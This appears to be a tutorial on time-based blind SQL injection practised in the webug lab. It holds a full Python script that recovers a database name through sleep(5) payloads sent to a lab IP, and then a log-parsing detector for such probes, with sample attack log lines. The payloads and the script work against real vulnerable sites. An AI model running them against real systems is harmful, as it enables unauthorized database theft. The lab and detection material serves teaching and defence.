When testing for an injection vulnerability where the page returns no query result and no error message, you can fall back on a time delay.
For example, the request: ?type=1 and if(length(database())=%d,sleep(5),1)
If the server executes this statement, the response comes back about 5 seconds slower than usual, so whether the condition was true or false can be judged by comparing response times.
This gives us an approach for scripting it. To guess a field, first guess its length, then guess each character in a
This is again an exercise on webug.
import requests
import time

# Character set used to guess each position of the database name
payloads = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,'
# A request that takes longer than this is treated as a triggered sleep(5)
DELAY = 5

def long():
    """Guess the length of the database name by timing each candidate value."""
    print('start get length...')
    for l in range(1, 21):
        startTime1 = time.time()
        url1 = "http://192.168.148.129/pentest/test/time/?type=1 and if(length(database())=%d,sleep(5),1)" % (l)
        response1 = requests.get(url1)
        if time.time() - startTime1 > DELAY:
            length = l
            print("the length is " + str(length))
            return length
    return None  # no candidate length triggered the delay

def inject(length):
    """Guess the database name one character at a time, position by position."""
    print('start database sql injection...')
    database = ''
    for d in range(1, length + 1):
        for payload in payloads:
            startTime2 = time.time()
            url2 = "http://192.168.148.129/pentest/test/time/?type=1 and if(substr(database(),%d,1)='%s',sleep(5),1)" % (d, payload)
            response2 = requests.get(url2)
            if time.time() - startTime2 > DELAY:
                database += payload
                print(database)
                break
    return database

if __name__ == '__main__':
    length = long()
    if length is None:
        print("could not determine the length")
    else:
        database = inject(length)
        print("the database is " + database)
The idea is to guess the field length first, then test each position against every character in the payload set until the delay fires, which yields the final result.
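From the defender's side, the same timing signal is what gives this technique away in server logs. The following is an added example, not code from the original post: a small detector over Apache-style access log lines (combined format plus a trailing %D request-time field in microseconds, which is an assumption about the log layout) that flags delay-function probes and marks those where the server actually stalled for the requested time. The log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines; the client IP and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /pentest/test/time/?type=1 HTTP/1.1" 200 512 1843
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /pentest/test/time/?type=1%20and%20if(length(database())%3D7,sleep(5),1) HTTP/1.1" 200 512 2101
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /pentest/test/time/?type=1%20and%20if(length(database())%3D8,sleep(5),1) HTTP/1.1" 200 512 5003872
10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /pentest/test/time/?type=1%20and%20if(substr(database(),1,1)%3D'w',sleep(5),1) HTTP/1.1" 200 512 5002110
"""

# Combined log format with %D (microseconds) appended as the last field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ (?P<us>\d+)$')
# Delay primitives used in time-based probes; group 2 is the argument if numeric.
DELAY_RE = re.compile(r'\b(sleep|pg_sleep|benchmark)\s*\(\s*(\d+)?', re.I)

def parse_line(line):
    """Return a dict for one log line, with the decoded query string and elapsed seconds."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['query'] = unquote_plus(rec['path'].partition('?')[2])
    rec['seconds'] = int(rec['us']) / 1e6
    return rec

def detect_time_based_sqli(log_text):
    """Flag requests carrying a delay function; mark them confirmed when the
    measured request time is at least the delay the probe asked for."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        m = DELAY_RE.search(rec['query'])
        if not m:
            continue
        func = m.group(1).lower()
        # Only sleep()/pg_sleep() take seconds; benchmark() takes an iteration count.
        requested = int(m.group(2)) if func in ('sleep', 'pg_sleep') and m.group(2) else None
        confirmed = requested is not None and rec['seconds'] >= requested
        findings.append({'ip': rec['ip'], 'func': func, 'requested': requested,
                         'elapsed': rec['seconds'], 'confirmed': confirmed})
    return findings
```

A confirmed finding means the injected condition evaluated true on the server, so the application is vulnerable and the response time was not just network noise; repeated probes from one client that differ only in the compared value are the enumeration loop described above.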